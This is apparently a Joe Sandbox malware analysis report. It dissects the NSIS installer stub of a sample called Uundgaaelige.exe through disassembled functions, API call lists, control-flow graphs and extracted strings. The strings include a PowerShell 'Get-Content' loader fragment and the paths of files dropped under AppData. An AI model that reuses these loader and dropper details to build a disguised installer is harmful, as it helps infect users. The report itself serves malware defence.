                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 33747ec9ccf1e96e03ed3acadba13ccb82446055e1a2ca0fa1c9679c5aff3799
                                                  • Instruction ID: 4aa70ef1b53fe275c3baa8fcae8ec6f6e0a9bb882f540f469220498d10fac131
                                                  • Opcode Fuzzy Hash: 33747ec9ccf1e96e03ed3acadba13ccb82446055e1a2ca0fa1c9679c5aff3799
                                                  • Instruction Fuzzy Hash: E9F16671D00229CBCF28CFA8C8946ADBBB1FF44305F25856ED456BB281D7785A9ACF44
                                                  Function 0040639C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileA.KERNELBASE(77273410,00422580,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,00405B62,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,77273410,?,77272EE0,00405881,?,77273410,77272EE0), ref: 004063A7
                                                  • FindClose.KERNELBASE(00000000), ref: 004063B3
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\nsa17F6.tmp, xrefs: 0040639C
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsa17F6.tmp
                                                  • API String ID: 2295610775-223556267
                                                  • Opcode ID: 650a356e45ca360fc625af9c332ec7d5af07b83f4ad3dd0750b8552cb66ed4f4
                                                  • Instruction ID: 7ad18ffb452888df832aaad39da4d842c40e8f76539fb63f13b43eacc156c169
                                                  • Opcode Fuzzy Hash: 650a356e45ca360fc625af9c332ec7d5af07b83f4ad3dd0750b8552cb66ed4f4
                                                  • Instruction Fuzzy Hash: 7CD012316050306BC20117386E0C84B7A5C9F053307119B37F9A6F12E0D7748CB286DD
                                                  Function 00403C86 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 185 403c86-403c98 186 403dd9-403de8 185->186 187 403c9e-403ca4 185->187 189 403e37-403e4c 186->189 190 403dea-403e32 GetDlgItem * 2 call 40415a SetClassLongA call 40140b 186->190 187->186 188 403caa-403cb3 187->188 191 403cb5-403cc2 SetWindowPos 188->191 192 403cc8-403ccb 188->192 194 403e8c-403e91 call 4041a6 189->194 195 403e4e-403e51 189->195 190->189 191->192 197 403ce5-403ceb 192->197 198 403ccd-403cdf ShowWindow 192->198 203 403e96-403eb1 194->203 200 403e53-403e5e call 401389 195->200 201 403e84-403e86 195->201 204 403d07-403d0a 197->204 205 403ced-403d02 DestroyWindow 197->205 198->197 200->201 222 403e60-403e7f SendMessageA 200->222 201->194 202 404127 201->202 210 404129-404130 202->210 208 403eb3-403eb5 call 40140b 203->208 209 403eba-403ec0 203->209 213 403d0c-403d18 SetWindowLongA 204->213 214 403d1d-403d23 204->214 211 404104-40410a 205->211 208->209 218 4040e5-4040fe DestroyWindow EndDialog 209->218 219 403ec6-403ed1 209->219 211->202 217 40410c-404112 211->217 213->210 220 403dc6-403dd4 call 4041c1 214->220 221 403d29-403d3a GetDlgItem 214->221 217->202 224 404114-40411d ShowWindow 217->224 218->211 219->218 225 403ed7-403f24 call 4060bb call 40415a * 3 GetDlgItem 219->225 220->210 226 403d59-403d5c 221->226 227 403d3c-403d53 SendMessageA IsWindowEnabled 221->227 222->210 224->202 255 403f26-403f2b 225->255 256 403f2e-403f6a ShowWindow KiUserCallbackDispatcher call 40417c EnableWindow 225->256 230 403d61-403d64 226->230 231 403d5e-403d5f 226->231 227->202 227->226 233 403d72-403d77 230->233 234 403d66-403d6c 230->234 232 403d8f-403d94 call 404133 231->232 232->220 236 403dad-403dc0 SendMessageA 233->236 238 403d79-403d7f 233->238 234->236 237 403d6e-403d70 234->237 236->220 237->232 241 403d81-403d87 call 40140b 238->241 242 403d96-403d9f call 40140b 238->242 251 403d8d 241->251 242->220 252 403da1-403dab 242->252 251->232 252->251 255->256 259 403f6c-403f6d 256->259 260 403f6f 256->260 261 403f71-403f9f GetSystemMenu EnableMenuItem SendMessageA 259->261 260->261 262 403fa1-403fb2 SendMessageA 261->262 263 403fb4 261->263 264 403fba-403ff4 call 40418f call 403c67 call 406099 lstrlenA call 4060bb SetWindowTextA call 401389 262->264 263->264 264->203 275 403ffa-403ffc 264->275 275->203 276 404002-404006 275->276 277 404025-404039 DestroyWindow 276->277 278 404008-40400e 276->278 277->211 280 40403f-40406c CreateDialogParamA 277->280 278->202 279 404014-40401a 278->279 279->203 281 404020 279->281 280->211 282 404072-4040c9 call 40415a GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 280->282 281->202 282->202 287 4040cb-4040de ShowWindow call 4041a6 282->287 289 4040e3 287->289 289->211
                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CC2
                                                  • ShowWindow.USER32(?), ref: 00403CDF
                                                  • DestroyWindow.USER32 ref: 00403CF3
                                                  • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403D0F
                                                  • GetDlgItem.USER32(?,?), ref: 00403D30
                                                  • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403D44
                                                  • IsWindowEnabled.USER32(00000000), ref: 00403D4B
                                                  • GetDlgItem.USER32(?,00000001), ref: 00403DF9
                                                  • GetDlgItem.USER32(?,00000002), ref: 00403E03
                                                  • SetClassLongA.USER32(?,000000F2,?), ref: 00403E1D
                                                  • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403E6E
                                                  • GetDlgItem.USER32(?,00000003), ref: 00403F14
                                                  • ShowWindow.USER32(00000000,?), ref: 00403F35
                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F47
                                                  • EnableWindow.USER32(?,?), ref: 00403F62
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F78
                                                  • EnableMenuItem.USER32(00000000), ref: 00403F7F
                                                  • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403F97
                                                  • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403FAA
                                                  • lstrlenA.KERNEL32(shaharit Setup: Completed,?,shaharit Setup: Completed,00000000), ref: 00403FD4
                                                  • SetWindowTextA.USER32(?,shaharit Setup: Completed), ref: 00403FE3
                                                  • ShowWindow.USER32(?,0000000A), ref: 00404117
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                  • String ID: shaharit Setup: Completed
                                                  • API String ID: 3282139019-2035189024
                                                  • Opcode ID: 52da23376c786621b01899b05758cefab0ff852f565aac078f1ff0427d2d89b0
                                                  • Instruction ID: afa02c3f8619f32611db6353159f3c7bef7a20c9a9555f4ee95b1447c660ea49
                                                  • Opcode Fuzzy Hash: 52da23376c786621b01899b05758cefab0ff852f565aac078f1ff0427d2d89b0
                                                  • Instruction Fuzzy Hash: 6FC11271600201FBDB206F61EE89D2B3AB8FB94306F51053EF661B51F0CB7998829B1D
                                                  Function 004038E9 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 290 4038e9-403901 call 406431 293 403903-403913 call 405ff7 290->293 294 403915-403946 call 405f80 290->294 303 403969-403992 call 403bae call 405b1f 293->303 299 403948-403959 call 405f80 294->299 300 40395e-403964 lstrcatA 294->300 299->300 300->303 308 403998-40399d 303->308 309 403a19-403a21 call 405b1f 303->309 308->309 310 40399f-4039c3 call 405f80 308->310 315 403a23-403a2a call 4060bb 309->315 316 403a2f-403a54 LoadImageA 309->316 310->309 317 4039c5-4039c7 310->317 315->316 319 403ad5-403add call 40140b 316->319 320 403a56-403a86 RegisterClassA 316->320 321 4039d8-4039e4 lstrlenA 317->321 322 4039c9-4039d6 call 405a5c 317->322 333 403ae7-403af2 call 403bae 319->333 334 403adf-403ae2 319->334 323 403ba4 320->323 324 403a8c-403ad0 SystemParametersInfoA CreateWindowExA 320->324 328 4039e6-4039f4 lstrcmpiA 321->328 329 403a0c-403a14 call 405a31 call 406099 321->329 322->321 327 403ba6-403bad 323->327 324->319 328->329 332 4039f6-403a00 GetFileAttributesA 328->332 329->309 337 403a02-403a04 332->337 338 403a06-403a07 call 405a78 332->338 343 403af8-403b12 ShowWindow call 4063c3 333->343 344 403b7b-403b7c call 405292 333->344 334->327 337->329 337->338 338->329 351 403b14-403b19 call 4063c3 343->351 352 403b1e-403b30 GetClassInfoA 343->352 348 403b81-403b83 344->348 349 403b85-403b8b 348->349 350 403b9d-403b9f call 40140b 348->350 349->334 353 403b91-403b98 call 40140b 349->353 350->323 351->352 356 403b32-403b42 GetClassInfoA RegisterClassA 352->356 357 403b48-403b6b DialogBoxParamA call 40140b 352->357 353->334 356->357 361 403b70-403b79 call 403839 357->361 361->327
                                                  APIs
                                                    • Part of subcall function 00406431: GetModuleHandleA.KERNEL32(?,?,?,00403380,0000000A), ref: 00406443
                                                    • Part of subcall function 00406431: GetProcAddress.KERNEL32(00000000,?), ref: 0040645E
                                                  • lstrcatA.KERNEL32(1033,shaharit Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,shaharit Setup: Completed,00000000,00000002,77273410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Uundgaaelige.exe",00000000), ref: 00403964
                                                  • lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\raffineredes\cerous,1033,shaharit Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,shaharit Setup: Completed,00000000,00000002,77273410), ref: 004039D9
                                                  • lstrcmpiA.KERNEL32(?,.exe), ref: 004039EC
                                                  • GetFileAttributesA.KERNEL32(: Completed), ref: 004039F7
                                                  • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\raffineredes\cerous), ref: 00403A40
                                                    • Part of subcall function 00405FF7: wsprintfA.USER32 ref: 00406004
                                                  • RegisterClassA.USER32(00423EC0), ref: 00403A7D
                                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403A95
                                                  • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403ACA
                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403B00
                                                  • GetClassInfoA.USER32(00000000,RichEdit20A,00423EC0), ref: 00403B2C
                                                  • GetClassInfoA.USER32(00000000,RichEdit,00423EC0), ref: 00403B39
                                                  • RegisterClassA.USER32(00423EC0), ref: 00403B42
                                                  • DialogBoxParamA.USER32(?,00000000,00403C86,00000000), ref: 00403B61
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: "C:\Users\user\Desktop\Uundgaaelige.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\raffineredes\cerous$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$shaharit Setup: Completed
                                                  • API String ID: 1975747703-3648823971
                                                  • Opcode ID: e3ec59447a3a5e7c0f5e833dcd66e45d6aae208e89073c804757ba1de371f7ae
                                                  • Instruction ID: 64417a43097117c8645ac50bcac1ff1732ece6e83d5d80f238bcb810e00f0866
                                                  • Opcode Fuzzy Hash: e3ec59447a3a5e7c0f5e833dcd66e45d6aae208e89073c804757ba1de371f7ae
                                                  • Instruction Fuzzy Hash: 8F61B770340604AED620AF65AD45F3B3A6CDB8575AF40453FF991B22E2CB7D9D028E2D
                                                  Function 00402D98 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 364 402d98-402de6 GetTickCount GetModuleFileNameA call 405c32 367 402df2-402e20 call 406099 call 405a78 call 406099 GetFileSize 364->367 368 402de8-402ded 364->368 376 402f10-402f1e call 402cf9 367->376 377 402e26-402e3d 367->377 369 403037-40303b 368->369 383 402f24-402f27 376->383 384 402fef-402ff4 376->384 379 402e41-402e4e call 4032af 377->379 380 402e3f 377->380 388 402e54-402e5a 379->388 389 402fab-402fb3 call 402cf9 379->389 380->379 386 402f53-402f9f GlobalAlloc call 406556 call 405c61 CreateFileA 383->386 387 402f29-402f41 call 4032c5 call 4032af 383->387 384->369 414 402fa1-402fa6 386->414 415 402fb5-402fe5 call 4032c5 call 40303e 386->415 387->384 412 402f47-402f4d 387->412 393 402eda-402ede 388->393 394 402e5c-402e74 call 405bed 388->394 389->384 397 402ee0-402ee6 call 402cf9 393->397 398 402ee7-402eed 393->398 394->398 411 402e76-402e7d 394->411 397->398 403 402f00-402f0a 398->403 404 402eef-402efd call 4064e8 398->404 403->376 403->377 404->403 411->398 416 402e7f-402e86 411->416 412->384 412->386 414->369 424 402fea-402fed 415->424 416->398 418 402e88-402e8f 416->418 418->398 419 402e91-402e98 418->419 419->398 421 402e9a-402eba 419->421 421->384 423 402ec0-402ec4 421->423 425 402ec6-402eca 423->425 426 402ecc-402ed4 423->426 424->384 427 402ff6-403007 424->427 425->376 425->426 426->398 428 402ed6-402ed8 426->428 429 403009 427->429 430 40300f-403014 427->430 428->398 429->430 431 403015-40301b 430->431 431->431 432 40301d-403035 call 405bed 431->432 432->369
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00402DAC
                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Uundgaaelige.exe,00000400), ref: 00402DC8
                                                    • Part of subcall function 00405C32: GetFileAttributesA.KERNELBASE(00000003,00402DDB,C:\Users\user\Desktop\Uundgaaelige.exe,80000000,00000003), ref: 00405C36
                                                    • Part of subcall function 00405C32: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C58
                                                  • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Uundgaaelige.exe,C:\Users\user\Desktop\Uundgaaelige.exe,80000000,00000003), ref: 00402E11
                                                  • GlobalAlloc.KERNELBASE(00000040,0040A130), ref: 00402F58
                                                  Strings
                                                  • C:\Users\user\Desktop\Uundgaaelige.exe, xrefs: 00402DB2, 00402DC1, 00402DD5, 00402DF2
                                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FA1
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00402DA2, 00402F70
                                                  • C:\Users\user\Desktop, xrefs: 00402DF3, 00402DF8, 00402DFE
                                                  • soft, xrefs: 00402E88
                                                  • Error launching installer, xrefs: 00402DE8
                                                  • Inst, xrefs: 00402E7F
                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402FEF
                                                  • "C:\Users\user\Desktop\Uundgaaelige.exe", xrefs: 00402D98
                                                  • Null, xrefs: 00402E91
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                  • String ID: "C:\Users\user\Desktop\Uundgaaelige.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Uundgaaelige.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                  • API String ID: 2803837635-1236753566
                                                  • Opcode ID: 4785f0ebff018845c403b6ca7344f0ae65bd881e692373c18b1951fa0e6bcd5c
                                                  • Instruction ID: 415a6227fd12514a0fe47228c9aaee062227cda2d2dbc78d85e3b2e5f7ba07c2
                                                  • Opcode Fuzzy Hash: 4785f0ebff018845c403b6ca7344f0ae65bd881e692373c18b1951fa0e6bcd5c
                                                  • Instruction Fuzzy Hash: 2561B271A40205ABDB20EF64DE89B9E7AB8EB40358F20413BF514B62D1DB7C99419B9C
                                                  Function 004060BB Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 199stringCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 435 4060bb-4060c6 436 4060c8-4060d7 435->436 437 4060d9-4060ef 435->437 436->437 438 4062e0-4062e4 437->438 439 4060f5-406100 437->439 441 406112-40611c 438->441 442 4062ea-4062f4 438->442 439->438 440 406106-40610d 439->440 440->438 441->442 445 406122-406129 441->445 443 4062f6-4062fa call 406099 442->443 444 4062ff-406300 442->444 443->444 447 4062d3 445->447 448 40612f-406163 445->448 449 4062d5-4062db 447->449 450 4062dd-4062df 447->450 451 406280-406283 448->451 452 406169-406173 448->452 449->438 450->438 455 4062b3-4062b6 451->455 456 406285-406288 451->456 453 406175-406179 452->453 454 40618d 452->454 453->454 462 40617b-40617f 453->462 459 406194-40619b 454->459 460 4062c4-4062d1 lstrlenA 455->460 461 4062b8-4062bf call 4060bb 455->461 457 406298-4062a4 call 406099 456->457 458 40628a-406296 call 405ff7 456->458 473 4062a9-4062af 457->473 458->473 464 4061a0-4061a2 459->464 465 40619d-40619f 459->465 460->438 461->460 462->454 468 406181-406185 462->468 471 4061a4-4061bf call 405f80 464->471 472 4061db-4061de 464->472 465->464 468->454 469 406187-40618b 468->469 469->459 478 4061c4-4061c7 471->478 476 4061e0-4061ec GetSystemDirectoryA 472->476 477 4061ee-4061f1 472->477 473->460 475 4062b1 473->475 479 406278-40627e call 406303 475->479 480 406262-406265 476->480 481 4061f3-406201 GetWindowsDirectoryA 477->481 482 40625e-406260 477->482 483 406267-40626b 478->483 484 4061cd-4061d6 call 4060bb 478->484 479->460 480->479 480->483 481->482 482->480 485 406203-40620d 482->485 483->479 490 40626d-406273 lstrcatA 483->490 484->480 487 406227-40623d SHGetSpecialFolderLocation 485->487 488 40620f-406212 485->488 493 40625b 487->493 494 40623f-406259 SHGetPathFromIDListA CoTaskMemFree 487->494 488->487 492 406214-40621b 488->492 490->479 496 406223-406225 492->496 493->482 494->480 494->493 496->480 496->487
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(: Completed,00000400), ref: 004061E6
                                                  • GetWindowsDirectoryA.KERNEL32(: Completed,00000400,?,Completed,00000000,004051F8,Completed,00000000), ref: 004061F9
                                                  • SHGetSpecialFolderLocation.SHELL32(004051F8,00000000,?,Completed,00000000,004051F8,Completed,00000000), ref: 00406235
                                                  • SHGetPathFromIDListA.SHELL32(00000000,: Completed), ref: 00406243
                                                  • CoTaskMemFree.OLE32(00000000), ref: 0040624F
                                                  • lstrcatA.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406273
                                                  • lstrlenA.KERNEL32(: Completed,?,Completed,00000000,004051F8,Completed,00000000,00000000,00000000,00000000), ref: 004062C5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                  • String ID: "$Acrasiales=Get-Content 'C:\Users\user\AppData\Roaming\raffineredes\cerous\Chugging\Dialektologi.Alt$: Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$l8h
                                                  • API String ID: 717251189-609418067
                                                  • Opcode ID: ab93b42b91f91bae910e6fac62c15208670ece31f71cd1d64f2b49d88cab81d9
                                                  • Instruction ID: 009d83548d98726144a2e54fa316bc550aecd198e2c9f4ca7d92c8f0a1cd1b24
                                                  • Opcode Fuzzy Hash: ab93b42b91f91bae910e6fac62c15208670ece31f71cd1d64f2b49d88cab81d9
                                                  • Instruction Fuzzy Hash: 7361F271900105AEDF20AF64C894B7A3BA4EB56710F1241BFE913BA2D1C77C8962CB4E
                                                  Function 00401759 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 147stringtimeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 497 401759-40177c call 402ac1 call 405a9e 502 401786-401798 call 406099 call 405a31 lstrcatA 497->502 503 40177e-401784 call 406099 497->503 508 40179d-4017a3 call 406303 502->508 503->508 513 4017a8-4017ac 508->513 514 4017ae-4017b8 call 40639c 513->514 515 4017df-4017e2 513->515 522 4017ca-4017dc 514->522 523 4017ba-4017c8 CompareFileTime 514->523 517 4017e4-4017e5 call 405c0d 515->517 518 4017ea-401806 call 405c32 515->518 517->518 525 401808-40180b 518->525 526 40187e-4018a7 call 4051c0 call 40303e 518->526 522->515 523->522 527 401860-40186a call 4051c0 525->527 528 40180d-40184f call 406099 * 2 call 4060bb call 406099 call 4057b5 525->528 540 4018a9-4018ad 526->540 541 4018af-4018bb SetFileTime 526->541 538 401873-401879 527->538 528->513 561 401855-401856 528->561 542 40295a 538->542 540->541 544 4018c1-4018cc FindCloseChangeNotification 540->544 541->544 545 40295c-402960 542->545 547 402951-402954 544->547 548 4018d2-4018d5 544->548 547->542 550 4018d7-4018e8 call 4060bb lstrcatA 548->550 551 4018ea-4018ed call 4060bb 548->551 555 4018f2-4022e6 call 4057b5 550->555 551->555 555->545 555->547 561->538 563 401858-401859 561->563 563->527
                                                  APIs
                                                  • lstrcatA.KERNEL32(00000000,00000000,Destroy,C:\Users\user\AppData\Roaming\raffineredes\cerous\Feltrkkeflgerne,00000000,00000000,00000031), ref: 00401798
                                                  • CompareFileTime.KERNEL32(-00000014,?,Destroy,Destroy,00000000,00000000,Destroy,C:\Users\user\AppData\Roaming\raffineredes\cerous\Feltrkkeflgerne,00000000,00000000,00000031), ref: 004017C2
                                                    • Part of subcall function 00406099: lstrcpynA.KERNEL32(?,?,00000400,004033DF,00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 004060A6
                                                    • Part of subcall function 004051C0: lstrlenA.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000,?), ref: 004051F9
                                                    • Part of subcall function 004051C0: lstrlenA.KERNEL32(00402D70,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000), ref: 00405209
                                                    • Part of subcall function 004051C0: lstrcatA.KERNEL32(Completed,00402D70,00402D70,Completed,00000000,00000000,00000000), ref: 0040521C
                                                    • Part of subcall function 004051C0: SetWindowTextA.USER32(Completed,Completed), ref: 0040522E
                                                    • Part of subcall function 004051C0: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405254
                                                    • Part of subcall function 004051C0: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040526E
                                                    • Part of subcall function 004051C0: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040527C
                                                  Strings
                                                  Memory Dump Source
